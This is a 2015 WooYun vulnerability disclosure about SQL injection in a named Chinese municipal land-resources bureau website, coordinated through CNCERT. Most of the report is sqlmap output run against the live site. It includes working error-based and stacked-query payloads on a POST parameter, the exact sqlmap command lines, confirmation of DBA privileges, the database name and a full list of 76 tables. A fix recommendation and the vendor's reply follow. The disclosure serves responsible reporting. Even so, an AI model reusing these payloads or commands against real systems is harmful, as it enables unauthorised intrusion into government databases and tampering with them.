Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0123552

Title: SQL injection in a certain city's Land and Resources bureau site

Related vendor: CNCERT (National Internet Emergency Center)

Author: elevensec11

Submitted: 2015-07-03 16:34

Fixed: 2015-08-21 09:54

Published: 2015-08-21 09:54

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 5

Status: handed to the third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-07-03: details reported to the vendor, awaiting vendor handling
2015-07-07: vendor confirmed; details visible to the vendor only
2015-07-17: details opened to core white hats and relevant domain experts
2015-07-27: details opened to regular white hats
2015-08-06: details opened to intern white hats
2015-08-21: details opened to the public

Brief description:

The Xianyang Municipal Land and Resources information site has a SQL injection flaw; through it the content the site publishes can be controlled.

Detailed description:

Injection point:

http://www.xygtzyj.gov.cn/admin/ywjggs/zl_ywjggsMore.asp

The database user has DBA privileges, and the web server is (remarkably) still IIS 5.0.

[screenshot: 1.png]


Proof of vulnerability:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:55:57

[15:55:57] [INFO] parsing HTTP request from 'oo.txt'
[15:55:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: itemName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: chid=1&itemName=123%' AND 2824=CONVERT(INT,(SELECT CHAR(113)+CHAR(...)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2824=2824) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(110)+CHAR(113))) AND '%'='&imageField.x=32&imageField.y=7

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: chid=1&itemName=123%'; WAITFOR DELAY '0:0:5'--&imageField.x=32&imageField.y=7
---
[15:55:58] [INFO] testing Microsoft SQL Server
[15:55:58] [INFO] confirming Microsoft SQL Server
[15:56:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[15:56:04] [INFO] testing if current user is DBA
current user is DBA: True
[15:56:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[15:56:05] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap12\output\www.xygtzyj.gov.cn'

[*] shutting down at 15:56:05
C:\Python27\sqlmap12>sqlmap.py -r oo.txt -p itemName --dbms "microsoft sql server" --current-db

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[*] starting at 15:56:20

[15:56:20] [INFO] parsing HTTP request from 'oo.txt'
[15:56:20] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: itemName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: chid=1&itemName=123%' AND 2824=CONVERT(INT,(SELECT CHAR(113)+CHAR(...)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2824=2824) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(110)+CHAR(113))) AND '%'='&imageField.x=32&imageField.y=7

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: chid=1&itemName=123%'; WAITFOR DELAY '0:0:5'--&imageField.x=32&imageField.y=7
---
[15:56:21] [INFO] testing Microsoft SQL Server
[15:56:21] [INFO] confirming Microsoft SQL Server
[15:56:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[15:56:25] [INFO] fetching current database
[15:56:29] [INFO] retrieved: xygt
current database: 'xygt'
[15:56:29] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[15:56:29] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap12\output\www.xygtzyj.gov.cn'

[*] shutting down at 15:56:29
C:\Python27\sqlmap12>sqlmap.py -r oo.txt -p itemName --dbms "microsoft sql server" --tables -D xygt

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[*] starting at 15:56:47

[15:56:47] [INFO] parsing HTTP request from 'oo.txt'
[15:56:47] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: itemName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: chid=1&itemName=123%' AND 2824=CONVERT(INT,(SELECT CHAR(113)+CHAR(...)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2824=2824) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(110)+CHAR(113))) AND '%'='&imageField.x=32&imageField.y=7

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: chid=1&itemName=123%'; WAITFOR DELAY '0:0:5'--&imageField.x=32&imageField.y=7
---
[15:56:48] [INFO] testing Microsoft SQL Server
[15:56:48] [INFO] confirming Microsoft SQL Server
[15:56:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2000
[15:56:54] [INFO] fetching tables for database: xygt
[15:56:55] [INFO] the SQL query used returns 76 entries
[15:56:56] [INFO] retrieved: dbo.a_accuse
[15:56:57] [INFO] retrieved: dbo.a_accusetype
[15:56:58] [INFO] retrieved: dbo.a_adv
[15:57:00] [INFO] retrieved: dbo.a_channel
[15:57:01] [INFO] retrieved: dbo.a_channeltype
[15:57:02] [INFO] retrieved: dbo.a_color
[15:57:03] [INFO] retrieved: dbo.a_dbsource
[15:57:07] [INFO] retrieved: dbo.a_fileupload
[15:57:09] [INFO] retrieved: dbo.a_funclass
[15:57:10] [INFO] retrieved: dbo.a_funcreate
[15:57:11] [INFO] retrieved: dbo.a_function
[15:57:12] [INFO] retrieved: dbo.a_functiontype
[15:57:13] [INFO] retrieved: dbo.a_geocode
[15:57:14] [INFO] retrieved: dbo.a_inputhelp
[15:57:15] [INFO] retrieved: dbo.a_inputtype
[15:57:16] [INFO] retrieved: dbo.a_journal
[15:57:17] [INFO] retrieved: dbo.a_journalchannel
[15:57:22] [INFO] retrieved: dbo.a_keyword
[15:57:23] [INFO] retrieved: dbo.a_keyword_type
[15:57:27] [INFO] retrieved: dbo.a_lyb
[15:57:28] [INFO] retrieved: dbo.a_mail
[15:57:29] [INFO] retrieved: dbo.a_mailsend
[15:57:30] [INFO] retrieved: dbo.a_mailsetup
[15:57:31] [INFO] retrieved: dbo.a_mailtemp
[15:57:32] [INFO] retrieved: dbo.a_member
[15:57:33] [INFO] retrieved: dbo.a_menutree
[15:57:37] [INFO] retrieved: dbo.a_news
[15:57:38] [INFO] retrieved: dbo.a_pageclick
[15:57:40] [INFO] retrieved: dbo.a_picture
[15:57:41] [INFO] retrieved: dbo.a_Review
[15:57:45] [INFO] retrieved: dbo.a_stat_Address
[15:57:46] [INFO] retrieved: dbo.a_stat_Area
[15:57:47] [INFO] retrieved: dbo.a_stat_Browser
[15:57:48] [INFO] retrieved: dbo.a_stat_Day
[15:57:49] [INFO] retrieved: dbo.a_stat_InfoList
[15:57:51] [INFO] retrieved: dbo.a_stat_IpInfo
[15:57:52] [INFO] retrieved: dbo.a_stat_IpInfo_old
[15:57:56] [INFO] retrieved: dbo.a_stat_Ipone
[15:57:57] [INFO] retrieved: dbo.a_stat_IpScope
[15:57:59] [INFO] retrieved: dbo.a_stat_Iptwo
[15:58:00] [INFO] retrieved: dbo.a_stat_log
[15:58:04] [INFO] retrieved: dbo.a_stat_Month
[15:58:05] [INFO] retrieved: dbo.a_stat_Mozilla
[15:58:06] [INFO] retrieved: dbo.a_stat_online
[15:58:10] [INFO] retrieved: dbo.a_stat_Refer
[15:58:11] [INFO] retrieved: dbo.a_stat_Screen
[15:58:13] [INFO] retrieved: dbo.a_stat_System
[15:58:14] [INFO] retrieved: dbo.a_stat_Visit
[15:58:15] [INFO] retrieved: dbo.a_stat_Visitor
[15:58:16] [INFO] retrieved: dbo.a_stat_Weburl
[15:58:17] [INFO] retrieved: dbo.a_stat_Week
[15:58:18] [INFO] retrieved: dbo.a_stat_Year
[15:58:21] [INFO] retrieved: dbo.a_sysconfig
[15:58:22] [INFO] retrieved: dbo.a_template
[15:58:23] [INFO] retrieved: dbo.a_temptag
[15:58:24] [INFO] retrieved: dbo.a_temptype
[15:58:25] [INFO] retrieved: dbo.a_url
[15:58:26] [INFO] retrieved: dbo.a_user
[15:58:27] [INFO] retrieved: dbo.a_usergroup
[15:58:29] [INFO] retrieved: dbo.a_vote
[15:58:30] [INFO] retrieved: dbo.dirs
[15:58:31] [INFO] retrieved: dbo.dtproperties
[15:58:33] [INFO] retrieved: dbo.n_ckqcr
[15:58:35] [INFO] retrieved: dbo.n_ckqspjg
[15:58:36] [INFO] retrieved: dbo.n_ckxkznjjg
[15:58:37] [INFO] retrieved: dbo.n_gytdsyqcrht
[15:58:41] [INFO] retrieved: dbo.n_jsxmydspjg
[15:58:42] [INFO] retrieved: dbo.n_kyqzr
[15:58:43] [INFO] retrieved: dbo.n_tdbgdcjg
[15:58:44] [INFO] retrieved: dbo.n_tddjjg
[15:58:48] [INFO] retrieved: dbo.n_tdzrdyjg
[15:58:53] [INFO] retrieved: dbo.n_xmgp
[15:58:54] [INFO] retrieved: dbo.n_xmgpuserinfo
[15:58:56] [INFO] retrieved: dbo.n_zone
[15:59:06] [INFO] retrieved: dbo.sysconstraints
[15:59:08] [INFO] retrieved: dbo.syssegments
Database: xygt
[76 tables]
+-------------------+
| a_Review          |
| a_accuse          |
| a_accusetype      |
| a_adv             |
| a_channel         |
| a_channeltype     |
| a_color           |
| a_dbsource        |
| a_fileupload      |
| a_funclass        |
| a_funcreate       |
| a_function        |
| a_functiontype    |
| a_geocode         |
| a_inputhelp       |
| a_inputtype       |
| a_journal         |
| a_journalchannel  |
| a_keyword         |
| a_keyword_type    |
| a_lyb             |
| a_mail            |
| a_mailsend        |
| a_mailsetup       |
| a_mailtemp        |
| a_member          |
| a_menutree        |
| a_news            |
| a_pageclick       |
| a_picture         |
| a_stat_Address    |
| a_stat_Area       |
| a_stat_Browser    |
| a_stat_Day        |
| a_stat_InfoList   |
| a_stat_IpInfo     |
| a_stat_IpInfo_old |
| a_stat_IpScope    |
| a_stat_Ipone      |
| a_stat_Iptwo      |
| a_stat_Month      |
| a_stat_Mozilla    |
| a_stat_Refer      |
| a_stat_Screen     |
| a_stat_System     |
| a_stat_Visit      |
| a_stat_Visitor    |
| a_stat_Weburl     |
| a_stat_Week       |
| a_stat_Year       |
| a_stat_log        |
| a_stat_online     |
| a_sysconfig       |
| a_template        |
| a_temptag         |
| a_temptype        |
| a_url             |
| a_user            |
| a_usergroup       |
| a_vote            |
| dirs              |
| dtproperties      |
| n_ckqcr           |
| n_ckqspjg         |
| n_ckxkznjjg       |
| n_gytdsyqcrht     |
| n_jsxmydspjg      |
| n_kyqzr           |
| n_tdbgdcjg        |
| n_tddjjg          |
| n_tdzrdyjg        |
| n_xmgp            |
| n_xmgpuserinfo    |
| n_zone            |
| sysconstraints    |
| syssegments       |
+-------------------+


[screenshot: 2.png]

Fix recommendation:

Filter the input (and pass it to the query as a bound parameter instead of concatenating it into the SQL string).

Copyright notice: when reposting, credit the source: elevensec11@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-07-07 09:53

Vendor reply:

CNVD has confirmed and reproduced the reported vulnerability; it has been passed via CNCERT to the Shaanxi branch centre, which will coordinate handling with the unit that operates the website.

Latest status:

None yet